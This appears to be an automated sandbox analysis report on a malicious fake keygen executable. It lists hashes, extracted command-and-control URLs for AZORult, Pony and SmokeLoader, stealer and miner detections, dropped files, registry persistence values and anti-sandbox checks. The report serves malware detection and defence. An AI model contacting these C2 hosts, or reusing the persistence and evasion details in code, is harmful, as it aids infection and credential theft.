Resubmissions
13-01-2022 13:19
220113-qkhx6sade2 412-09-2021 07:40
210912-jhysaacbd3 1012-09-2021 07:40
210912-jhp55sfbbr 1012-09-2021 07:39
210912-jhc6kscbd2 1012-09-2021 07:39
210912-jg161sfbbp 1012-09-2021 07:38
210912-jgmnmafbbn 10Analysis
-
max time kernel
1801s -
max time network
1791s -
platform
windows11_x64 -
resource
win11 -
submitted
12-09-2021 07:39
Static task
static1
Behavioral task
behavioral1
Sample
Dot.Tk.123.ticket.keygen.by.CORE.bin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Dot.Tk.123.ticket.keygen.by.CORE.bin.exe
Resource
win11
Behavioral task
behavioral3
Sample
Dot.Tk.123.ticket.keygen.by.CORE.bin.exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
Dot.Tk.123.ticket.keygen.by.CORE.bin.exe
Resource
win10-en
General
-
Target
Dot.Tk.123.ticket.keygen.by.CORE.bin.exe
-
Size
6.2MB
-
MD5
0cb3efeb5d9312e068c57e7e55affed7
-
SHA1
aad1c65d257c7d2929ffb916114bc532feba0a16
-
SHA256
a974231d8889e05fedfbe73b5cc58e414de6fd5031765c998a24ac326f35b0b2
-
SHA512
236ce9aa9e71f279e7833c4f0afbad15a2de4aaf62e78a82f1132224951f25f0a184aacfe5c963a20481c20cdb12e1a56e6aaf662f4a07c756abe0c539488898
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
pony
http://www.oldhorse.info
Extracted
smokeloader
2020
http://fazanaharahe1.xyz/
http://xandelissane2.xyz/
http://ustiassosale3.xyz/
http://cytheriata4.xyz/
http://ggiergionard5.xyz/
http://rrelleynaniy6.store/
http://danniemusoa7.store/
http://nastanizab8.store/
http://onyokandis9.store/
http://dmunaavank10.store/
http://gilmandros11.site/
http://cusanthana12.site/
http://willietjeana13.site/
http://ximusokall14.site/
http://blodinetisha15.site/
http://urydiahadyss16.club/
http://glasamaddama17.club/
http://marlingarly18.club/
http://alluvianna19.club/
http://xandirkaniel20.club/
Extracted
metasploit
windows/single_exec
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral2/memory/4432-533-0x0000000005160000-0x0000000005A7E000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 884 4936 rundll32.exe 4 -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
description pid Process procid_target PID 2416 created 4280 2416 WerFault.exe 102 PID 4040 created 4356 4040 WerFault.exe 103 PID 2416 created 1444 2416 WerFault.exe 115 PID 1960 created 5060 1960 WerFault.exe 108 PID 4872 created 4640 4872 WerFault.exe 120 PID 3392 created 3944 3392 WerFault.exe 134 PID 3652 created 5008 3652 WerFault.exe 137 PID 5320 created 5108 5320 MSIF5B1.tmp 234 PID 5824 created 4888 5824 WerFault.exe 175 PID 5960 created 1544 5960 WerFault.exe 157 PID 3924 created 2412 3924 WerFault.exe 169 PID 4924 created 2040 4924 WerFault.exe 158 PID 5224 created 1992 5224 WerFault.exe 173 PID 5108 created 4432 5108 WerFault.exe 155 PID 2848 created 6016 2848 WerFault.exe 257 PID 5860 created 2032 5860 WerFault.exe 258 PID 1068 created 1952 1068 WerFault.exe 265 PID 2944 created 4192 2944 WerFault.exe 262 PID 1188 created 4748 1188 WerFault.exe 266 PID 5956 created 1092 5956 WerFault.exe 285 -
suricata: ET MALWARE Known Sinkhole Response Header
suricata: ET MALWARE Known Sinkhole Response Header
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M15
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M15
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/2412-499-0x0000000004910000-0x00000000049E1000-memory.dmp family_vidar -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral2/memory/5000-686-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 4548 keygen-pr.exe 2208 keygen-step-1.exe 3060 keygen-step-6.exe 4432 keygen-step-3.exe 3612 keygen-step-4.exe 1784 key.exe 2112 winnetdriv.exe 4612 jhuuee.exe 2464 key.exe 1312 Crack.exe 1880 Crack.exe 2512 PBrowFile28.exe 2556 chrome3.exe 5064 PublicDwlBrowser188.exe 4280 2.exe 4356 setup.exe 4612 jhuuee.exe 2348 md1_1eaf.exe 5060 6254081.exe 3932 3711423.exe 4048 WinHoster.exe 4624 6817322.exe 4640 2537520.exe 1460 C3KHKEn~m73GVLA.exE 3944 b81bc93c.exe 5008 asd.exe 3524 Setup.exe 1724 7Zn3Pn08QssXfVxAesGVzaIB.exe 1144 wUJlGzFeEH6o0Z1DQAZWu72E.exe 5104 _JId4e8RMtjJlE0E_0myM75Q.exe 5108 B7oBRefKlnvLxTUk7A5247IV.exe 4432 ttc4qfn2w_h5zeVHlPOzh8EN.exe 4636 QLOPdlJjYI7MoPRwJxa1bDht.exe 4108 xM8nfaje063EvkNO1NgonNdg.exe 1188 v3MIJzXhkcdk57h9C6fR6Hry.exe 5036 xPAAlqXyVJs72ZYjY5o9Mv0L.exe 3652 FFApTDMNevZhT9xoFqdxz9G5.exe 2268 DPR8aeTAKot62jgARQMVE86Y.exe 4792 VGzbIkLyVi91CjT1VcFgnzRu.exe 2400 maFWooMFK5Qj2Qi4Tp5ge2LX.exe 1408 Z0C9e0hIzHto92rlBJjZT0HV.exe 2412 9hc0EGzp2ovANCVqKn_Ta8VP.exe 2948 m_HQyecTI5CaVV75_UKBYNsi.exe 1332 T1Co2sVBqOVKikVL5Z0HVlh_.exe 3184 W0OaMutDODenU7tGyf8ti4VC.exe 4688 BBpm_5Q5qrBtb61PhXyaFhcB.exe 2040 rX0IlY0LeaXpdXrY9k1FvbnV.exe 1488 NUYBLx5Zp9Uv4LxiycBoW8bN.exe 1544 RZdj0v2Ms34qv60Et3KRHI1x.exe 1044 P8GPV61e4aQH4Yeejcyjhha2.exe 1952 UMwUB7aYnEyPzvvpgV27kGRl.exe 4888 Helper.exe 1992 KY2h2nAcmqPEv6bBk71Gi0MC.exe 3436 NUYBLx5Zp9Uv4LxiycBoW8bN.exe 1636 inst001.exe 5024 cutm3.exe 2168 md8_8eus.exe 1736 X4d4XArNWDu.eXE 5292 services64.exe 5504 Rimasta.exe.com 5864 Conhost.exe 4948 Rimasta.exe.com 5168 Z0C9e0hIzHto92rlBJjZT0HV.exe 4744 Rimasta.exe.com -
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion T1Co2sVBqOVKikVL5Z0HVlh_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7Zn3Pn08QssXfVxAesGVzaIB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FFApTDMNevZhT9xoFqdxz9G5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9B43.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B1E9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSIF5A0.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 63D4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7B06.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9B43.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Helper.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion m_HQyecTI5CaVV75_UKBYNsi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7B06.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FFApTDMNevZhT9xoFqdxz9G5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion maFWooMFK5Qj2Qi4Tp5ge2LX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSIF5B2.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion DPR8aeTAKot62jgARQMVE86Y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7Zn3Pn08QssXfVxAesGVzaIB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v3MIJzXhkcdk57h9C6fR6Hry.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion maFWooMFK5Qj2Qi4Tp5ge2LX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UMwUB7aYnEyPzvvpgV27kGRl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MSIF5A0.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 63D4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B1E9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Helper.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion DPR8aeTAKot62jgARQMVE86Y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion m_HQyecTI5CaVV75_UKBYNsi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UMwUB7aYnEyPzvvpgV27kGRl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion T1Co2sVBqOVKikVL5Z0HVlh_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion W0OaMutDODenU7tGyf8ti4VC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v3MIJzXhkcdk57h9C6fR6Hry.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MSIF5B2.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion W0OaMutDODenU7tGyf8ti4VC.exe -
Loads dropped DLL 9 IoCs
pid Process 1444 rundll32.exe 3852 rundll32.exe 3852 rundll32.exe 4888 Helper.exe 4688 BBpm_5Q5qrBtb61PhXyaFhcB.exe 2332 regsvr32.exe 2332 regsvr32.exe 4688 BBpm_5Q5qrBtb61PhXyaFhcB.exe 4688 BBpm_5Q5qrBtb61PhXyaFhcB.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000100000002b221-366.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3711423.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce wUJlGzFeEH6o0Z1DQAZWu72E.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" wUJlGzFeEH6o0Z1DQAZWu72E.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce xM8nfaje063EvkNO1NgonNdg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" xM8nfaje063EvkNO1NgonNdg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7Zn3Pn08QssXfVxAesGVzaIB.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA m_HQyecTI5CaVV75_UKBYNsi.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 63D4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DPR8aeTAKot62jgARQMVE86Y.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA T1Co2sVBqOVKikVL5Z0HVlh_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSIF5B2.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UMwUB7aYnEyPzvvpgV27kGRl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA W0OaMutDODenU7tGyf8ti4VC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7B06.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9B43.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md1_1eaf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FFApTDMNevZhT9xoFqdxz9G5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA v3MIJzXhkcdk57h9C6fR6Hry.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B1E9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Helper.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA maFWooMFK5Qj2Qi4Tp5ge2LX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSIF5A0.tmp -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: MSIEXEC.EXE File opened (read-only) \??\P: MSIEXEC.EXE File opened (read-only) \??\U: MSIEXEC.EXE File opened (read-only) \??\X: MSIEXEC.EXE File opened (read-only) \??\E: MSIEXEC.EXE File opened (read-only) \??\H: MSIEXEC.EXE File opened (read-only) \??\K: MSIEXEC.EXE File opened (read-only) \??\Q: MSIEXEC.EXE File opened (read-only) \??\R: MSIEXEC.EXE File opened (read-only) \??\V: MSIEXEC.EXE File opened (read-only) \??\W: MSIEXEC.EXE File opened (read-only) \??\I: MSIEXEC.EXE File opened (read-only) \??\J: MSIEXEC.EXE File opened (read-only) \??\N: MSIEXEC.EXE File opened (read-only) \??\O: MSIEXEC.EXE File opened (read-only) \??\Y: MSIEXEC.EXE File opened (read-only) \??\Z: MSIEXEC.EXE File opened (read-only) \??\Z: keygen-pr.exe File opened (read-only) \??\L: MSIEXEC.EXE File opened (read-only) \??\F: MSIEXEC.EXE File opened (read-only) \??\G: MSIEXEC.EXE File opened (read-only) \??\S: MSIEXEC.EXE File opened (read-only) \??\T: MSIEXEC.EXE File opened (read-only) \??\A: MSIEXEC.EXE File opened (read-only) \??\B: MSIEXEC.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 98 ipinfo.io 1 ip-api.com 1 ipinfo.io 43 ipinfo.io 51 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 4888 Helper.exe 2268 DPR8aeTAKot62jgARQMVE86Y.exe 2948 m_HQyecTI5CaVV75_UKBYNsi.exe 3652 FFApTDMNevZhT9xoFqdxz9G5.exe 1188 v3MIJzXhkcdk57h9C6fR6Hry.exe 1724 7Zn3Pn08QssXfVxAesGVzaIB.exe 2400 maFWooMFK5Qj2Qi4Tp5ge2LX.exe 1952 UMwUB7aYnEyPzvvpgV27kGRl.exe 1332 T1Co2sVBqOVKikVL5Z0HVlh_.exe 5448 MSIF5B2.tmp 5544 MSIF5A0.tmp 3184 W0OaMutDODenU7tGyf8ti4VC.exe 1892 63D4.exe 5548 7B06.exe 4756 9B43.exe 4464 B1E9.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1784 set thread context of 2464 1784 key.exe 91 PID 1408 set thread context of 5168 1408 Z0C9e0hIzHto92rlBJjZT0HV.exe 221 PID 5292 set thread context of 5000 5292 services64.exe 246 PID 4708 set thread context of 5668 4708 21D2.exe 253 PID 5284 set thread context of 5336 5284 2926.exe 256 PID 1952 set thread context of 5568 1952 47ED.exe 267 PID 500 set thread context of 3448 500 8326.exe 283 -
Drops file in Program Files directory 7 IoCs
description ioc Process File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini cmd.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe VGzbIkLyVi91CjT1VcFgnzRu.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe VGzbIkLyVi91CjT1VcFgnzRu.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe cmd.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe cmd.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe cmd.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe cmd.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\winnetdriv.exe Process not Found File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\winnetdriv.exe Process not Found -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
pid pid_target Process procid_target 4608 4280 WerFault.exe 102 5080 4356 WerFault.exe 103 4432 1444 WerFault.exe 115 4496 5060 WerFault.exe 108 4224 4640 WerFault.exe 120 504 3944 WerFault.exe 134 812 5008 WerFault.exe 137 5612 5108 WerFault.exe 141 6072 4888 WerFault.exe 175 3016 1544 WerFault.exe 157 5772 2412 WerFault.exe 169 5712 2040 WerFault.exe 158 1616 4432 WerFault.exe 155 3992 6016 WerFault.exe 257 1196 2032 WerFault.exe 258 4224 1952 WerFault.exe 265 5408 4192 WerFault.exe 262 3500 4748 WerFault.exe 266 1580 1092 WerFault.exe 285 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Z0C9e0hIzHto92rlBJjZT0HV.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Z0C9e0hIzHto92rlBJjZT0HV.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Z0C9e0hIzHto92rlBJjZT0HV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 21D2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 21D2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 21D2.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7B06.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5152 schtasks.exe 5144 schtasks.exe 5952 schtasks.exe 4620 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5036 timeout.exe 4072 timeout.exe -
Enumerates system info in registry 2 TTPs 38 IoCs
